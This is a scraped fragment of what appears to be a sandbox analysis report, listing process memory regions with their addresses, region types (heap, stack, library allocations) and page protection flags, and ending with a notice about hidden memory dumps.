|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
20ACEFFE000
|
heap
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1AD0412D000
|
trusted library allocation
|
page read and write
|
||
|
1AD03F45000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB6830000
|
trusted library allocation
|
page read and write
|
||
|
20AC68C1000
|
trusted library allocation
|
page read and write
|
||
|
1AD02B45000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20ACEF9B000
|
heap
|
page read and write
|
||
|
1DCCE05A000
|
heap
|
page read and write
|
||
|
20AB65B0000
|
heap
|
page readonly
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1AD042A6000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFA9000
|
heap
|
page read and write
|
||
|
1F0B3879000
|
heap
|
page read and write
|
||
|
20ACF003000
|
heap
|
page read and write
|
||
|
20AB23C0000
|
unkown
|
page execute and read and write
|
||
|
1AD02FD1000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC1A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
20ACF0F9000
|
heap
|
page read and write
|
||
|
20AB6795000
|
trusted library allocation
|
page read and write
|
||
|
1FE0000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
353AAFF000
|
unkown
|
page read and write
|
||
|
AB451B6000
|
stack
|
page read and write
|
||
|
1AD011C5000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1C482180000
|
heap
|
page read and write
|
||
|
20AB2F05000
|
heap
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
20ACF057000
|
heap
|
page read and write
|
||
|
20AB2F66000
|
unkown
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
1F0CC1A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1CC318F0000
|
trusted library allocation
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3810000
|
heap
|
page read and write
|
||
|
1F0B3876000
|
heap
|
page read and write
|
||
|
10000
|
unkown
|
page readonly
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0AFE03000
|
heap
|
page read and write
|
||
|
23DB000
|
heap
|
page read and write
|
||
|
20ACEFBA000
|
heap
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page execute and read and write
|
||
|
175C08F5000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFDF000
|
heap
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
26EF000
|
stack
|
page read and write
|
||
|
20AB2FFE000
|
heap
|
page read and write
|
||
|
20ACEF9A000
|
heap
|
page read and write
|
||
|
1CC31920000
|
trusted library allocation
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
1412000
|
unkown
|
page readonly
|
||
|
1CC318F3000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFA9000
|
heap
|
page read and write
|
||
|
14213000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37C0000
|
trusted library allocation
|
page read and write
|
||
|
1AD02E91000
|
heap
|
page read and write
|
||
|
1F0CC3ED000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
175C06C6000
|
heap
|
page read and write
|
||
|
1C482410000
|
heap
|
page read and write
|
||
|
7FFAAC588000
|
trusted library allocation
|
page read and write
|
||
|
14211000
|
trusted library allocation
|
page read and write
|
||
|
20AD0D50000
|
trusted library section
|
page read and write
|
||
|
72177FB000
|
stack
|
page read and write
|
||
|
20AB2F20000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1CC318F3000
|
trusted library allocation
|
page read and write
|
||
|
233D000
|
heap
|
page read and write
|
||
|
20ACEFAF000
|
heap
|
page read and write
|
||
|
721734E000
|
stack
|
page read and write
|
||
|
175C0610000
|
heap
|
page read and write
|
||
|
20ACEFDF000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB2FE4000
|
heap
|
page read and write
|
||
|
CDA1EFF000
|
unkown
|
page read and write
|
||
|
20AB2E70000
|
unkown
|
page read and write
|
||
|
1F0B3840000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
266E000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
20ACEFDF000
|
heap
|
page read and write
|
||
|
20ACEF9A000
|
heap
|
page read and write
|
||
|
1F0B3870000
|
heap
|
page read and write
|
||
|
AB45D7E000
|
unkown
|
page readonly
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1AD02A40000
|
heap
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3850000
|
trusted library allocation
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
1DCCDF90000
|
heap
|
page read and write
|
||
|
1AD02A47000
|
heap
|
page execute and read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1AD03F38000
|
trusted library allocation
|
page read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
1F0B3876000
|
trusted library allocation
|
page read and write
|
||
|
1C3D7EE8000
|
heap
|
page read and write
|
||
|
1AD041A9000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3761000
|
trusted library allocation
|
page read and write
|
||
|
1AD04275000
|
trusted library allocation
|
page read and write
|
||
|
AB454FE000
|
unkown
|
page read and write
|
||
|
AB4577E000
|
unkown
|
page readonly
|
||
|
20ACF028000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
21C4000
|
unkown
|
page readonly
|
||
|
721878E000
|
stack
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFFD000
|
heap
|
page read and write
|
||
|
7FFAAC333000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0B37A0000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFFD000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B0080000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
There are 779 hidden memdumps, click here to show them.